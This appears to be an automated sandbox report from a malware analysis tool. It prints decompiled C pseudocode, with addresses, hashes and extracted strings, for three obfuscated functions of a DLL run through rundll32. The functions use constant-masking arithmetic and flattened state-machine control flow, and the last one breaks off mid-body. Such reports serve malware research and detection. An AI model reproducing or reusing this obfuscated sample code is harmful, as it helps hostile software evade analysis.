Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 0l$<51w$?$O]$]5$an$h1$o$p,$<$G$u
API String ID: 0-3006474019
Opcode ID: 74d76b10b9d4370b64a4bc373e1a6ceffc90527932f21f10725b78de007f7111
Instruction ID: ac942b02fd569ebf8a703113eda67409e276ddad1249719e751fe3bc4d0fd9ab
Opcode Fuzzy Hash: 74d76b10b9d4370b64a4bc373e1a6ceffc90527932f21f10725b78de007f7111
Instruction Fuzzy Hash: 71D111715087819FE368CF24C98954BBBE1FBC4748F208A1CF5D59A2A0D7B5D989CF42

Uniqueness

Uniqueness Score: -1.00%

Function 10006BC0, Relevance: 15.3, Strings: 12, Instructions: 252
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E10006BC0() {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _t254;
				intOrPtr _t256;
				intOrPtr _t258;
				void* _t259;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				void* _t299;
				char _t303;
				signed int* _t304;
				void* _t306;

				_t304 =  &_v116;
				_v56 = 0x84b9;
				_v56 = _v56 << 0xb;
				_v56 = _v56 + 0x5ea0;
				_v56 = _v56 ^ 0x0426650f;
				_v108 = 0x299e;
				_v108 = _v108 >> 8;
				_v108 = _v108 >> 0xa;
				_v108 = _v108 >> 0xc;
				_v108 = _v108 ^ 0x000045b0;
				_v112 = 0xab11;
				_v112 = _v112 << 0x10;
				_v112 = _v112 + 0xffff3408;
				_v112 = _v112 << 6;
				_v112 = _v112 ^ 0xc40d3ae9;
				_v80 = 0xee41;
				_t261 = 0x22;
				_v80 = _v80 / _t261;
				_v80 = _v80 ^ 0x83f67a84;
				_t259 = 0;
				_v80 = _v80 ^ 0x83f65317;
				_t299 = 0x23ec3b81;
				_v116 = 0xfedd;
				_v116 = _v116 + 0xd1e5;
				_t262 = 0x7f;
				_v116 = _v116 / _t262;
				_v116 = _v116 << 0xc;
				_v116 = _v116 ^ 0x003ad050;
				_v44 = 0xeb09;
				_t263 = 0x2e;
				_v44 = _v44 * 0x66;
				_v44 = _v44 ^ 0x005de128;
				_v48 = 0x515a;
				_v48 = _v48 | 0x7fc990a4;
				_v48 = _v48 ^ 0x7fc9cd68;
				_v84 = 0xaabb;
				_v84 = _v84 >> 1;
				_v84 = _v84 * 0x5b;
				_v84 = _v84 ^ 0x001e5e5d;
				_v96 = 0x583;
				_v96 = _v96 + 0xd9a1;
				_v96 = _v96 / _t263;
				_v96 = _v96 + 0x3e5;
				_v96 = _v96 ^ 0x000008a1;
				_v100 = 0x8d71;
				_t264 = 0x53;
				_v100 = _v100 * 0xd;
				_v100 = _v100 >> 4;
				_v100 = _v100 / _t264;
				_v100 = _v100 ^ 0x00004ab6;
				_v76 = 0xeaf8;
				_v76 = _v76 << 0xb;
				_v76 = _v76 << 5;
				_v76 = _v76 ^ 0xeaf83e17;
				_v104 = 0xfdf7;
				_v104 = _v104 + 0xffff8125;
				_v104 = _v104 >> 0xc;
				_v104 = _v104 << 2;
				_v104 = _v104 ^ 0x00004c62;
				_v40 = 0x8162;
				_v40 = _v40 | 0xc691c83f;
				_v40 = _v40 ^ 0xc691a24d;
				_v72 = 0x9e4d;
				_v72 = _v72 << 0xc;
				_v72 = _v72 + 0xffff6436;
				_v72 = _v72 ^ 0x09e41bc8;
				_v92 = 0x78eb;
				_v92 = _v92 >> 0xa;
				_v92 = _v92 | 0xec9d9334;
				_v92 = _v92 << 0xc;
				_v92 = _v92 ^ 0xd933d049;
				_v36 = 0x856f;
				_t265 = 0x39;
				_v36 = _v36 / _t265;
				_v36 = _v36 ^ 0x00001c57;
				_v60 = 0x6631;
				_v60 = _v60 >> 2;
				_v60 = _v60 + 0xffffdfe4;
				_v60 = _v60 ^ 0xffffcf25;
				_v64 = 0x3444;
				_v64 = _v64 >> 0xf;
				_v64 = _v64 >> 0xf;
				_v64 = _v64 ^ 0x00000359;
				_v68 = 0xe444;
				_t266 = 0x50;
				_v68 = _v68 / _t266;
				_v68 = _v68 + 0x16a0;
				_v68 = _v68 ^ 0x00006446;
				_v32 = 0xb62e;
				_v32 = _v32 >> 7;
				_v32 = _v32 ^ 0x00006ec1;
				_v52 = 0x9375;
				_v52 = _v52 >> 8;
				_t267 = 0x71;
				_v52 = _v52 * 0xb;
				_v52 = _v52 ^ 0x00007061;
				_v88 = 0x468b;
				_v88 = _v88 / _t267;
				_v88 = _v88 * 0x47;
				_v88 = _v88 >> 2;
				_v88 = _v88 ^ 0x0000270a;
				_t298 = _v28;
				_t303 = _v28;
				goto L1;
				do {
					while(1) {
						L1:
						_t306 = _t299 - 0x23ec3b81;
						if(_t306 > 0) {
							break;
						}
						if(_t306 == 0) {
							_t299 = 0x2b5ba3b6;
							continue;
						}
						if(_t299 == 0x591e35e) {
							E1001B981(_v40, _v8 + 1,  *0x100221b0 + 0x10, _v12, _v72, _v92);
							_t304 =  &(_t304[4]);
							_t259 = 1;
							_t299 = 0x3378ea2d;
							 *((intOrPtr*)( *0x100221b0)) = _v16;
							continue;
						}
						if(_t299 == 0x5f14f0f) {
							_t254 = E1001CAA0( &_v24, _v96,  &_v16, _v100, _v76, _v104);
							_t304 =  &(_t304[4]);
							asm("sbb esi, esi");
							_t299 = ( ~_t254 & 0xd218f931) + 0x3378ea2d;
							continue;
						}
						if(_t299 == 0xba7b4d4) {
							_t256 = E1001B806(_v108, _t303, _v112, _v80,  &_v28);
							_t298 = _t256;
							_t304 =  &(_t304[3]);
							if(_t256 == 0) {
								L23:
								return _t259;
							}
							_t299 = 0x176f3fd8;
							continue;
						}
						if(_t299 != 0x176f3fd8) {
							goto L20;
						} else {
							_t299 = 0x2e66d4aa;
							if(_v28 > 2) {
								_t258 = E10015AB8(_v116, _v44, _v48,  *((intOrPtr*)(_t298 + 8)),  &_v20, _v84);
								_t304 =  &(_t304[4]);
								_v24 = _t258;
								if(_t258 != 0) {
									_t299 = 0x5f14f0f;
								}
							}
							continue;
						}
					}
					if(_t299 == 0x2b5ba3b6) {
						_t303 = E1001B8E7();
						_t299 = 0xba7b4d4;
						goto L20;
					}
					if(_t299 == 0x2e66d4aa) {
						E10007BE0(_v32, _t298, _v52, _v88);
						goto L23;
					}
					if(_t299 != 0x3378ea2d) {
						goto L20;
					}
					E100091CD(_v36, _v60, _v64, _v24, _v68);
					_t304 =  &(_t304[3]);
					_t299 = 0x2e66d4aa;
					goto L1;
					L20:
				} while (_t299 != 0x16656518);
				goto L23;
			}

0x10006bc0
0x10006bc3
0x10006bcd
0x10006bd2
0x10006bda
0x10006be2
0x10006bea
0x10006bef
0x10006bf4
0x10006bf9
0x10006c01
0x10006c09
0x10006c0e
0x10006c16
0x10006c1b
0x10006c23
0x10006c35
0x10006c3a
0x10006c40
0x10006c48
0x10006c4a
0x10006c52
0x10006c57
0x10006c5f
0x10006c6b
0x10006c70
0x10006c76
0x10006c7b
0x10006c83
0x10006c90
0x10006c93
0x10006c97
0x10006c9f
0x10006ca7
0x10006caf
0x10006cb7
0x10006cbf
0x10006cc8
0x10006ccc
0x10006cd4
0x10006cdc
0x10006cec
0x10006cf0
0x10006cf8
0x10006d00
0x10006d0d
0x10006d0e
0x10006d12
0x10006d1d
0x10006d21
0x10006d29
0x10006d31
0x10006d36
0x10006d3b
0x10006d43
0x10006d4b
0x10006d53
0x10006d58
0x10006d5d
0x10006d65
0x10006d6f
0x10006d77
0x10006d7f
0x10006d87
0x10006d8c
0x10006d94
0x10006d9c
0x10006da4
0x10006da9
0x10006db1
0x10006db6
0x10006dbe
0x10006dcc
0x10006dd1
0x10006dd7
0x10006ddf
0x10006de7
0x10006dec
0x10006df4
0x10006dfc
0x10006e04
0x10006e09
0x10006e0e
0x10006e16
0x10006e22
0x10006e27
0x10006e2d
0x10006e35
0x10006e3d
0x10006e45
0x10006e4a
0x10006e52
0x10006e5a
0x10006e64
0x10006e65
0x10006e69
0x10006e71
0x10006e7f
0x10006e88
0x10006e8c
0x10006e91
0x10006e99
0x10006e9d
0x10006e9d
0x10006ea1
0x10006ea1
0x10006ea1
0x10006ea1
0x10006ea7
0x00000000
0x00000000
0x10006ead
0x10006fc6
0x00000000
0x10006fc6
0x10006eb9
0x10006fa3
0x10006fb6
0x10006fb9
0x10006fba
0x10006fbf
0x00000000
0x10006fbf
0x10006ec5
0x10006f5e
0x10006f63
0x10006f6a
0x10006f72
0x00000000
0x10006f72
0x10006ecd
0x10006f29
0x10006f2e
0x10006f30
0x10006f35
0x10007044
0x1000704a
0x1000704a
0x10006f3b
0x00000000
0x10006f3b
0x10006ed5
0x00000000
0x10006edb
0x10006ee0
0x10006ee5
0x10006eff
0x10006f04
0x10006f07
0x10006f0d
0x10006f0f
0x10006f0f
0x10006f0d
0x00000000
0x10006ee5
0x10006ed5
0x10006fd6
0x10007017
0x10007019
0x00000000
0x10007019
0x10006fde
0x1000703a
0x00000000
0x10007040
0x10006fe6
0x00000000
0x00000000
0x10006ffc
0x10007001
0x10007004
0x00000000
0x1000701e
0x1000701e
0x00000000

Strings

-x3, xrefs: 10006FE0
ap, xrefs: 10006E69
x, xrefs: 10006D9C
A, xrefs: 10006C23
-x3, xrefs: 10006FBA
Fd, xrefs: 10006E35
1f, xrefs: 10006DDF
D4, xrefs: 10006DFC
', xrefs: 10006E91
bL, xrefs: 10006D5D
ZQ, xrefs: 10006C9F
(], xrefs: 10006C97

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: '$(]$-x3$-x3$1f$A$D4$Fd$ZQ$ap$bL$x
API String ID: 0-4015965578
Opcode ID: 865ac30736ce067385c778ebf4445e8f621965de7af294fe3d4e1e32b7b11566
Instruction ID: 7f07636c7d856d37613f0c6add9871aecd81a47647e8cfb522ba5c80404945ec
Opcode Fuzzy Hash: 865ac30736ce067385c778ebf4445e8f621965de7af294fe3d4e1e32b7b11566
Instruction Fuzzy Hash: 95C141729083419FE714CF25C88A40BBBE2FBC4798F20891DF599962A4D7B9D948CF43

Uniqueness

Uniqueness Score: -1.00%

Function 1001B3FE, Relevance: 14.0, Strings: 11, Instructions: 209
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E1001B3FE() {
				char _v520;
				char _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				unsigned int _v1136;
				void* _t216;
				void* _t229;
				intOrPtr _t258;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				unsigned int* _t266;

				_t266 =  &_v1136;
				_v1052 = 0x59feef;
				_v1048 = 0x2a3fe0;
				_t229 = 0x3abfade2;
				_t258 = 0;
				_v1044 = 0;
				_v1096 = 0x3e7b;
				_v1096 = _v1096 << 8;
				_v1096 = _v1096 | 0x4b45bfac;
				_v1096 = _v1096 ^ 0x4b7f9484;
				_v1120 = 0xeeae;
				_v1120 = _v1120 + 0xffff949c;
				_v1120 = _v1120 + 0xffff26d2;
				_v1120 = _v1120 ^ 0xc3b4e966;
				_v1120 = _v1120 ^ 0x3c4b1d4d;
				_v1088 = 0x77a0;
				_v1088 = _v1088 | 0x40386f55;
				_v1088 = _v1088 << 0x10;
				_v1088 = _v1088 ^ 0x7ff5165c;
				_v1064 = 0xf0bf;
				_v1064 = _v1064 << 9;
				_v1064 = _v1064 ^ 0x01e162a5;
				_v1072 = 0x124d;
				_t259 = 0x72;
				_v1072 = _v1072 / _t259;
				_v1072 = _v1072 ^ 0x00002ee6;
				_v1128 = 0x5292;
				_v1128 = _v1128 << 8;
				_v1128 = _v1128 + 0xe9bf;
				_v1128 = _v1128 + 0x3238;
				_v1128 = _v1128 ^ 0x0053b92a;
				_v1136 = 0xc2f1;
				_v1136 = _v1136 + 0x6410;
				_v1136 = _v1136 >> 0xc;
				_v1136 = _v1136 + 0x63d1;
				_v1136 = _v1136 ^ 0x00000ac7;
				_v1112 = 0x7058;
				_t260 = 0x4b;
				_v1112 = _v1112 * 0xd;
				_v1112 = _v1112 << 6;
				_v1112 = _v1112 + 0x987c;
				_v1112 = _v1112 ^ 0x016df42c;
				_v1100 = 0x41a9;
				_v1100 = _v1100 + 0xffffec41;
				_v1100 = _v1100 + 0xffff9ba9;
				_v1100 = _v1100 ^ 0xffffd6d5;
				_v1104 = 0x872a;
				_v1104 = _v1104 / _t260;
				_v1104 = _v1104 >> 0x10;
				_v1104 = _v1104 ^ 0x0000287c;
				_v1080 = 0x8003;
				_v1080 = _v1080 | 0x7adfffb6;
				_v1080 = _v1080 ^ 0x7adf96d6;
				_v1084 = 0x5426;
				_v1084 = _v1084 + 0xe4e2;
				_v1084 = _v1084 ^ 0xc6a85055;
				_v1084 = _v1084 ^ 0xc6a96844;
				_v1092 = 0x916a;
				_v1092 = _v1092 >> 0x10;
				_v1092 = _v1092 | 0x14ea685d;
				_v1092 = _v1092 ^ 0x14ea6f72;
				_v1056 = 0x7cb0;
				_v1056 = _v1056 >> 7;
				_v1056 = _v1056 ^ 0x000061a1;
				_v1132 = 0x4cf9;
				_v1132 = _v1132 ^ 0x2fb41e14;
				_v1132 = _v1132 ^ 0xb509e885;
				_v1132 = _v1132 + 0x3858;
				_v1132 = _v1132 ^ 0x9abd8624;
				_v1124 = 0xb90b;
				_v1124 = _v1124 | 0x9d483c7c;
				_t261 = 0x31;
				_v1124 = _v1124 / _t261;
				_v1124 = _v1124 << 0x10;
				_v1124 = _v1124 ^ 0xbab966f1;
				_v1076 = 0x4837;
				_t262 = 0x28;
				_v1076 = _v1076 * 0x42;
				_v1076 = _v1076 ^ 0x39645d85;
				_v1076 = _v1076 ^ 0x3976b123;
				_v1060 = 0xa4fd;
				_v1060 = _v1060 / _t262;
				_v1060 = _v1060 ^ 0x00000d98;
				_v1068 = 0x96bf;
				_v1068 = _v1068 | 0xc49b968d;
				_v1068 = _v1068 ^ 0xc49bbea0;
				_v1108 = 0xf482;
				_v1108 = _v1108 + 0xffffa317;
				_v1108 = _v1108 | 0x011b1071;
				_v1108 = _v1108 << 2;
				_v1108 = _v1108 ^ 0x046e6bfd;
				_v1116 = 0x4fbc;
				_v1116 = _v1116 + 0xffff81fd;
				_v1116 = _v1116 + 0xffff31d8;
				_t263 = 5;
				_v1116 = _v1116 / _t263;
				_v1116 = _v1116 ^ 0x33332c42;
				do {
					while(_t229 != 0xe952e95) {
						if(_t229 == 0x1126b32b) {
							_push(0x10001000);
							_push(_v1128);
							E100163BF(E1001BF25(_v1064, _v1072, __eflags), __eflags, _v1112, _v1100,  &_v1040,  *0x100221b0, _v1104,  *0x100221b0 + 0x234,  *0x100221b0 + 0x10, _v1080);
							E1001C5F7(_v1084, _v1092, _v1056, _v1132, _t217);
							_t266 =  &(_t266[0xb]);
							_t229 = 0xe952e95;
							continue;
						} else {
							if(_t229 == 0x2ea5cfd6) {
								E10008C0C(_v1096, __eflags, _v1120, _v1088,  &_v520);
								_t266 =  &(_t266[3]);
								_t229 = 0x1126b32b;
								continue;
							} else {
								if(_t229 == 0x3423edaf) {
									E1001654F(_v1068, _v1108, _v1116,  &_v1040);
								} else {
									if(_t229 != 0x3abfade2) {
										goto L10;
									} else {
										_t229 = 0x2ea5cfd6;
										continue;
									}
								}
							}
						}
						L13:
						return _t258;
					}
					_t216 = E10013D7C( &_v1040, __eflags, _v1076, _v1060,  &_v520);
					_t266 =  &(_t266[3]);
					__eflags = _t216;
					_t258 =  !=  ? 1 : _t258;
					_t229 = 0x3423edaf;
					L10:
					__eflags = _t229 - 0x8af5a53;
				} while (__eflags != 0);
				goto L13;
			}

0x1001b3fe
0x1001b404
0x1001b40e
0x1001b416
0x1001b41f
0x1001b421
0x1001b425
0x1001b42d
0x1001b432
0x1001b43a
0x1001b442
0x1001b44a
0x1001b452
0x1001b45a
0x1001b462
0x1001b46a
0x1001b472
0x1001b47a
0x1001b47f
0x1001b487
0x1001b48f
0x1001b494
0x1001b49c
0x1001b4aa
0x1001b4af
0x1001b4b5
0x1001b4bd
0x1001b4c5
0x1001b4ca
0x1001b4d2
0x1001b4da
0x1001b4e2
0x1001b4ea
0x1001b4f2
0x1001b4f7
0x1001b4ff
0x1001b507
0x1001b514
0x1001b515
0x1001b519
0x1001b51e
0x1001b526
0x1001b52e
0x1001b536
0x1001b53e
0x1001b546
0x1001b54e
0x1001b55c
0x1001b560
0x1001b565
0x1001b56d
0x1001b575
0x1001b57d
0x1001b585
0x1001b58d
0x1001b595
0x1001b59d
0x1001b5a5
0x1001b5ad
0x1001b5b2
0x1001b5ba
0x1001b5c2
0x1001b5ca
0x1001b5cf
0x1001b5d7
0x1001b5df
0x1001b5e7
0x1001b5ef
0x1001b5f7
0x1001b5ff
0x1001b609
0x1001b621
0x1001b626
0x1001b62c
0x1001b631
0x1001b639
0x1001b646
0x1001b649
0x1001b64d
0x1001b655
0x1001b65d
0x1001b66d
0x1001b671
0x1001b679
0x1001b681
0x1001b689
0x1001b691
0x1001b699
0x1001b6a1
0x1001b6a9
0x1001b6ae
0x1001b6b6
0x1001b6be
0x1001b6c6
0x1001b6d2
0x1001b6d5
0x1001b6d9
0x1001b6e1
0x1001b6e1
0x1001b6ef
0x1001b731
0x1001b736
0x1001b77b
0x1001b794
0x1001b799
0x1001b79c
0x00000000
0x1001b6f1
0x1001b6f3
0x1001b725
0x1001b72a
0x1001b72d
0x00000000
0x1001b6f5
0x1001b6fb
0x1001b7f2
0x1001b701
0x1001b707
0x00000000
0x1001b70d
0x1001b70d
0x00000000
0x1001b70d
0x1001b707
0x1001b6fb
0x1001b6f3
0x1001b7f9
0x1001b805
0x1001b805
0x1001b7be
0x1001b7c5
0x1001b7c9
0x1001b7cb
0x1001b7ce
0x1001b7d3
0x1001b7d3
0x1001b7d3
0x00000000

Strings

Uo8@, xrefs: 1001B472
X8, xrefs: 1001B5EF
7H, xrefs: 1001B639
?*, xrefs: 1001B40E
&T, xrefs: 1001B585
82, xrefs: 1001B4D2
B,33, xrefs: 1001B6D9
Xp, xrefs: 1001B507
|(, xrefs: 1001B565
{>, xrefs: 1001B425
., xrefs: 1001B4B5

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: &T$7H$82$B,33$Uo8@$X8$Xp${>$|($.$?*
API String ID: 0-2199102758
Opcode ID: 78066439dbf68b0f30eec3b2653372f09639643f94e5358d5f4be4f09cd9386d
Instruction ID: 713d83d0593c4ddd124331638c6b3f8c97ab7d5c779b93df35cbcb4d530e2ad3
Opcode Fuzzy Hash: 78066439dbf68b0f30eec3b2653372f09639643f94e5358d5f4be4f09cd9386d
Instruction Fuzzy Hash: 69A1107150C3809FE398CF25D88985BBBE1FBC4358F504A1DF5969A2A0D7B5CA89CF42

Uniqueness

Uniqueness Score: -1.00%

Function 10016B45, Relevance: 12.9, Strings: 10, Instructions: 362
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E10016B45() {
				void* _t369;
				signed int _t372;
				signed int _t373;
				intOrPtr* _t374;
				signed int _t376;
				signed int _t378;
				signed int _t383;
				signed int _t389;
				void* _t395;
				signed int _t431;
				signed int _t432;
				signed int _t435;
				signed int _t436;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t440;
				signed int _t442;
				void* _t446;

				 *((intOrPtr*)(_t446 + 0xa4)) = 0x772f9f;
				 *(_t446 + 0xac) = 0;
				 *(_t446 + 0xa8) = 0x789ddf;
				_t395 = 0x19391156;
				 *(_t446 + 0x6c) = 0xa1c8;
				 *(_t446 + 0x6c) =  *(_t446 + 0x6c) << 0xd;
				 *(_t446 + 0x6c) =  *(_t446 + 0x6c) ^ 0x14390001;
				 *(_t446 + 0xc) = 0xff4b;
				 *(_t446 + 0xc) =  *(_t446 + 0xc) ^ 0x5146fe6d;
				 *(_t446 + 0xc) =  *(_t446 + 0xc) ^ 0x6d1dcf2b;
				 *(_t446 + 0xc) =  *(_t446 + 0xc) >> 5;
				 *(_t446 + 0xc) =  *(_t446 + 0xc) ^ 0x01e2de71;
				 *(_t446 + 0x14) = 0x3f5c;
				 *(_t446 + 0x14) =  *(_t446 + 0x14) | 0xe97d3723;
				 *(_t446 + 0xa0) = 0;
				_t22 = _t446 + 0x14; // 0xe97d3723
				 *(_t446 + 0x24) =  *_t22 * 0x76;
				 *(_t446 + 0x24) =  *(_t446 + 0x24) >> 7;
				 *(_t446 + 0x24) =  *(_t446 + 0x24) ^ 0x013f0ad7;
				 *(_t446 + 0x58) = 0x736e;
				 *(_t446 + 0x58) =  *(_t446 + 0x58) >> 1;
				_t435 = 0x7c;
				 *(_t446 + 0x5c) =  *(_t446 + 0x58) * 0x3a;
				 *(_t446 + 0x5c) =  *(_t446 + 0x5c) ^ 0x000d12ba;
				 *(_t446 + 0xac) = 0xcefa;
				 *(_t446 + 0xac) =  *(_t446 + 0xac) | 0xd3773184;
				 *(_t446 + 0xac) =  *(_t446 + 0xac) ^ 0xd377a5bb;
				 *(_t446 + 0x14) = 0xdd96;
				 *(_t446 + 0x14) =  *(_t446 + 0x14) + 0xffffff88;
				 *(_t446 + 0x14) =  *(_t446 + 0x14) ^ 0x5290399f;
				 *(_t446 + 0x14) =  *(_t446 + 0x14) << 0xd;
				 *(_t446 + 0x14) =  *(_t446 + 0x14) ^ 0x1c901162;
				 *(_t446 + 0x74) = 0x655b;
				 *(_t446 + 0x74) =  *(_t446 + 0x74) | 0xcd9490d8;
				 *(_t446 + 0x74) =  *(_t446 + 0x74) ^ 0xcd94b23a;
				 *(_t446 + 0xa0) = 0x6c7f;
				 *(_t446 + 0xa0) =  *(_t446 + 0xa0) ^ 0x13eba5b2;
				 *(_t446 + 0xa0) =  *(_t446 + 0xa0) ^ 0x13ebbb7e;
				 *(_t446 + 0x94) = 0x7a54;
				 *(_t446 + 0x94) =  *(_t446 + 0x94) / _t435;
				 *(_t446 + 0x94) =  *(_t446 + 0x94) ^ 0x00007779;
				 *(_t446 + 0x4c) = 0xc640;
				 *(_t446 + 0x4c) =  *(_t446 + 0x4c) >> 5;
				 *(_t446 + 0x4c) =  *(_t446 + 0x4c) ^ 0x0a555cb4;
				 *(_t446 + 0x4c) =  *(_t446 + 0x4c) ^ 0x0a557f70;
				 *(_t446 + 0x38) = 0x22ba;
				_t436 = 0x67;
				 *(_t446 + 0x38) =  *(_t446 + 0x38) / _t436;
				 *(_t446 + 0x38) =  *(_t446 + 0x38) >> 5;
				 *(_t446 + 0x38) =  *(_t446 + 0x38) + 0x267c;
				 *(_t446 + 0x38) =  *(_t446 + 0x38) ^ 0x00005dad;
				 *(_t446 + 0xb0) = 0x929;
				 *(_t446 + 0xb0) =  *(_t446 + 0xb0) + 0xffff6954;
				 *(_t446 + 0xb0) =  *(_t446 + 0xb0) ^ 0xffff7ae2;
				 *(_t446 + 0x18) = 0xce9e;
				 *(_t446 + 0x18) =  *(_t446 + 0x18) + 0xffff0e6b;
				 *(_t446 + 0x18) =  *(_t446 + 0x18) | 0x6011ff3c;
				 *(_t446 + 0x18) =  *(_t446 + 0x18) << 0xc;
				 *(_t446 + 0x18) =  *(_t446 + 0x18) ^ 0xfff39ad2;
				 *(_t446 + 0x70) = 0xb975;
				_t431 = 0x16;
				 *(_t446 + 0x6c) =  *(_t446 + 0x70) / _t431;
				 *(_t446 + 0x6c) =  *(_t446 + 0x6c) ^ 0x00003cc7;
				 *(_t446 + 0x64) = 0x8a7;
				_t437 = 0x17;
				 *(_t446 + 0x68) =  *(_t446 + 0x64) / _t437;
				 *(_t446 + 0x68) =  *(_t446 + 0x68) + 0x9f8;
				 *(_t446 + 0x68) =  *(_t446 + 0x68) ^ 0x00004bf2;
				 *(_t446 + 0xa8) = 0x9dab;
				 *(_t446 + 0xa8) =  *(_t446 + 0xa8) >> 3;
				 *(_t446 + 0xa8) =  *(_t446 + 0xa8) ^ 0x00004fe2;
				 *(_t446 + 0x8c) = 0xe61d;
				_t438 = 0x51;
				 *(_t446 + 0x8c) =  *(_t446 + 0x8c) * 0x24;
				 *(_t446 + 0x8c) =  *(_t446 + 0x8c) ^ 0x00200b54;
				 *(_t446 + 0x48) = 0x4300;
				 *(_t446 + 0x48) =  *(_t446 + 0x48) >> 0xb;
				 *(_t446 + 0x48) =  *(_t446 + 0x48) << 0xd;
				 *(_t446 + 0x48) =  *(_t446 + 0x48) ^ 0x00016849;
				 *(_t446 + 0x44) = 0x14fb;
				 *(_t446 + 0x44) =  *(_t446 + 0x44) >> 4;
				 *(_t446 + 0x44) =  *(_t446 + 0x44) >> 3;
				 *(_t446 + 0x44) =  *(_t446 + 0x44) ^ 0x000014fe;
				 *(_t446 + 0x64) = 0x908d;
				 *(_t446 + 0x64) =  *(_t446 + 0x64) + 0xda51;
				 *(_t446 + 0x64) =  *(_t446 + 0x64) ^ 0x6d67fea7;
				 *(_t446 + 0x64) =  *(_t446 + 0x64) ^ 0x6d669443;
				 *(_t446 + 0x24) = 0x5ccc;
				 *(_t446 + 0x24) =  *(_t446 + 0x24) * 0x61;
				 *(_t446 + 0x24) =  *(_t446 + 0x24) / _t438;
				 *(_t446 + 0x24) =  *(_t446 + 0x24) ^ 0x12e038eb;
				 *(_t446 + 0x24) =  *(_t446 + 0x24) ^ 0x12e0646f;
				 *(_t446 + 0x78) = 0x27f;
				 *(_t446 + 0x78) =  *(_t446 + 0x78) << 9;
				 *(_t446 + 0x78) =  *(_t446 + 0x78) ^ 0x0004fb39;
				 *(_t446 + 0x1c) = 0x6d1d;
				 *(_t446 + 0x1c) =  *(_t446 + 0x1c) >> 9;
				 *(_t446 + 0x1c) =  *(_t446 + 0x1c) + 0xb85e;
				 *(_t446 + 0x1c) =  *(_t446 + 0x1c) ^ 0xaa7cb7d8;
				 *(_t446 + 0x1c) =  *(_t446 + 0x1c) ^ 0xaa7c6457;
				 *(_t446 + 0x54) = 0x7318;
				 *(_t446 + 0x54) =  *(_t446 + 0x54) >> 0xd;
				 *(_t446 + 0x54) =  *(_t446 + 0x54) + 0xffff7495;
				 *(_t446 + 0x54) =  *(_t446 + 0x54) ^ 0xffff5a53;
				 *(_t446 + 0x90) = 0xb397;
				 *(_t446 + 0x90) =  *(_t446 + 0x90) + 0x578a;
				 *(_t446 + 0x90) =  *(_t446 + 0x90) ^ 0x00016114;
				 *(_t446 + 0x34) = 0xd228;
				 *(_t446 + 0x34) =  *(_t446 + 0x34) >> 4;
				 *(_t446 + 0x34) =  *(_t446 + 0x34) ^ 0x6376bfe7;
				 *(_t446 + 0x34) =  *(_t446 + 0x34) << 0xe;
				 *(_t446 + 0x34) =  *(_t446 + 0x34) ^ 0xacb136be;
				 *(_t446 + 0x88) = 0x4cf0;
				 *(_t446 + 0x88) =  *(_t446 + 0x88) + 0xaecf;
				 *(_t446 + 0x88) =  *(_t446 + 0x88) ^ 0x0000fedc;
				 *(_t446 + 0x2c) = 0x629e;
				 *(_t446 + 0x2c) =  *(_t446 + 0x2c) + 0xd78b;
				 *(_t446 + 0x2c) =  *(_t446 + 0x2c) + 0x81bf;
				 *(_t446 + 0x2c) =  *(_t446 + 0x2c) << 0xf;
				 *(_t446 + 0x2c) =  *(_t446 + 0x2c) ^ 0xddf43aaf;
				 *(_t446 + 0x98) = 0xefe2;
				 *(_t446 + 0x98) =  *(_t446 + 0x98) << 4;
				 *(_t446 + 0x98) =  *(_t446 + 0x98) ^ 0x000efba1;
				 *(_t446 + 0x50) = 0xde18;
				 *(_t446 + 0x50) =  *(_t446 + 0x50) + 0x6327;
				 *(_t446 + 0x50) =  *(_t446 + 0x50) | 0xdc33595a;
				 *(_t446 + 0x50) =  *(_t446 + 0x50) ^ 0xdc335491;
				 *(_t446 + 0x7c) = 0xe244;
				 *(_t446 + 0x7c) =  *(_t446 + 0x7c) ^ 0x4f81d147;
				 *(_t446 + 0x7c) =  *(_t446 + 0x7c) ^ 0x4f817701;
				 *(_t446 + 0x9c) = 0xcfc5;
				_t439 = 0x13;
				_t444 =  *(_t446 + 0x68);
				 *(_t446 + 0x98) =  *(_t446 + 0x9c) / _t439;
				 *(_t446 + 0x98) =  *(_t446 + 0x98) ^ 0x00007994;
				 *(_t446 + 0xa0) = 0xdcf0;
				 *(_t446 + 0xa0) =  *(_t446 + 0xa0) >> 5;
